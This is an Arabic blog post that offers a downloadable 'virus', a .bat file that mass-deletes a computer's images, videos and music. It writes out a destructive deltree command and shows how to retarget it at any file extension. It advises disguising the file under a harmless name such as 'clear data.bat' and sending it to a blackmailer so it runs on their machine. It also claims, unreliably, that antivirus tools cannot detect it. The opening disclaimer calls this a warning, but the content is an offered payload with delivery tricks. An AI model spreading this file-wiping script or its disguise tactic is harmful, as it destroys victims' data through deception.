فايروس حدف الصور و الملفات

 

رابط تحميل الفايروس 

You have to wait 15 seconds.

Download Timer
You have to wait 15 seconds.

Download Timer

⚠️ تنبيه ⚠️

جميع المعلومات المعروضة في هذه  التدوينه هي تحدير لي مستخدمين الحواسيب من الحيل التي يلجأ إليها الهاكرز ولو كانوا على مستوى بسيط من العلم، لي إختراق وتدمير الحواسيب. ونعرضها هنا ليتخذ المستخدم كافة الاحتياطات الممكنة لحماية جهازه من الاختراق ، نحن لسنا مسؤولين بأي حال من الأحوال عن الضرر الذي قد يلحق بجهازك الحاسوب أو أي جهاز اخر  نتيجة تجربتك لتلك البرمجيات أو سوء استخدامك .




فايروس حدف الصور و الملفات 


وهو عباره عن كود برمجي ، عند تشغيله يقوم بي حدف جمع الصور بي امتداد jpg , png و الفيديوهات بي امتداد mp4 , asf ,و حدف الاغاني بي امتداد mp4 ، بدون عمل فورمات.


تستطيع التعديل في الكود و جعله يعمل على حدف اي ملف ، كل ماعليك فعله نسخ هذا النص


cd\ 

deltree /y *.#



و وضع بدل علامه# اي امتداد تريده تم تأكد أن الملف بي امتداد bat تم اضغط على زر حفظ .


لي التعديل على الكود يمكنك استخدام notebad الموجوده في الويندوز ، ولي اندرويد و ios استخدام تطبيق quick edit لي تعديل الملف لي تحميل تطبيق quick edit من هذا الرابط .


هل الفايروس خطير 


يقوم الفايروس بي حدف الملفات و الصور و يمكنك اضافه ملفات أخرى لي حدفها ، الفايروس ليس خطير جدا في حال ليس لذيك ملفات مهمه .


ماهو الغرض من الفايروس 


الغرض من الفايروس هو في حال تعرضك لي ابتزاز من احد الأشخاص يطلب منك دفع مال مقابل حدف صور لك فإن هذا الفايروس هو المناسب. 


كيفيه تحميل الفايروس :


قم بي الضغط على زر تحميل الموجود في الأعلى ، 

تنتضر عداد الوقت بعد ذالك تقوم بي تحميل الفايروس ،⚠️ لاتقم بي فتحه ⚠️ تتأكد ان الفايروس بي امتداد bat على سبيل المثال 'clear data.bat" بعذ ذالك تقوم بي إرساله لي المبتز و هذا كل شيء.


هل يمكن لي برامج مكافحه الفايروسات اكتشافه:


لا يمكن لي هذا الفايروس إكتشافه من قبل هذه البرامج ، لي أن هذه البرامج مخصصه لي مكافحه الفيروسات التي تعمل بي شكل اوتوماتيك بي إذن من المبرمج نفسه ، ولاكن هذا الفايروس لن الا في حال تشغيله فقط .


الخلاصه :

إذا تعرضت لي الابتزاز من احد الأشخاص ، يطلب منك مبلغا ماليا مقابل عدم نشر صورك ، أو فعل شيء آخر، فإن هذا الفايروس هو المناسب ، بدون التوجه لي اي خبير برمجي أو شخص آخر و دفع المال ، احمي نفسك بي نفسك ....






'

إرسال تعليق

أحدث أقدم

You might like